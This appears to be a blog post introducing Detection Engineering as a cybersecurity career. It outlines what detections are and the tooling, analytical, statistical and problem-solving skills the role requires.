Detection Engineering Series: Detection Engineering Explained
Detection Engineering, what does the role entail?
What used to be a function of the job for an Incident responder, DART (Detection and Response) member, or a Threat Researcher is now a full blown career path on its own.
As the complexity and frequency of cyber threats increase, so does the demand for specialized roles to combat these threats.
Detection Engineering plays a crucial role in identifying and later preventing security breaches in organizations, frequently partnering with teams like Product Security and Enterprise Security.
But what exactly is this discipline and what skills does it require to succeed in this sub-domain of Cybersecurity?
Below is a general outline of what to look for.
The TLDR of Detection Engineering
In a nutshell, a detection is some kind of logic that results in an actionable finding that allows analysts or engineers to respond to said finding. This could be any of the following: KQL, SPL, Sigma rules, JSON, YAML, YARA, custom Python, and more.
For now, we can leave it as each detection being composed of logic; designed to detect specific patterns or anomalies that might indicate a security threat.
To become a Detection Engineer, you need to possess several essential skills.
The Essential Toolkit
Deep Understanding of Your Tools
In order to understand your tools you need a good foundation in network security, protocols, scripting, and be agnostic to tools which could include Intrusion Detection Systems (IDS), Endpoint Detection and Response (EDR), Security Information and Event Management (SIEM), and Security Orchestration, Automation and Response (SOAR). This is because the data from these tools will be used to then form the detection logic in some way, shape or form.
You should have a deep understanding of common attack methods, threat actors, and security best practices to detect and prevent security breaches.
Analytical
In addition, you need to be familiar with the techniques and methods used by attackers to gain unauthorized access to computer systems, networks, or data.
Analytical skills are critical to analyzing large volumes of data and identifying potential threats, patterns, and suspicious activities. You’re frequently going to be working with large datasets.
Stats
This means quantifying and measuring the effectiveness of your detection logic using statistical data related to events and alerts is also important.
You don’t need to be a statistician, just become proficient in the tools at your disposal. Being able to also tell a story through statistical data will be huge when it comes to management and other stakeholders. To be able to point at a chart or graph and say, “here is how we’re doing” is immensely valuable.
Problem Solving Skills
Problem-solving skills are essential for identifying and solving complex problems and making decisions under pressure. And when you’re in Detection & Response, this can be often.
For example, needing to come up with a detection and alert on it for a new internal threat and doing so urgently, or finding the root cause of a broken detection and implementing the fix because you have a blind spot.
Lastly, Detection Engineers must be proactive in seeking out new information and resources to improve their knowledge as the world of Cybersecurity is constantly evolving.
There are many posts that have talked about this very topic. From defining the concept of Detection Engineering, to lifecycles of how to implement detections.
Check out the following.
Understanding what skills are needed will equip you with the tools to succeed in Detection Engineering.
A later post will be dedicated to the intricacies of detections and alerts where we’ll do a deep dive.
I hope this helps understand another domain within the umbrella that is Cybersecurity.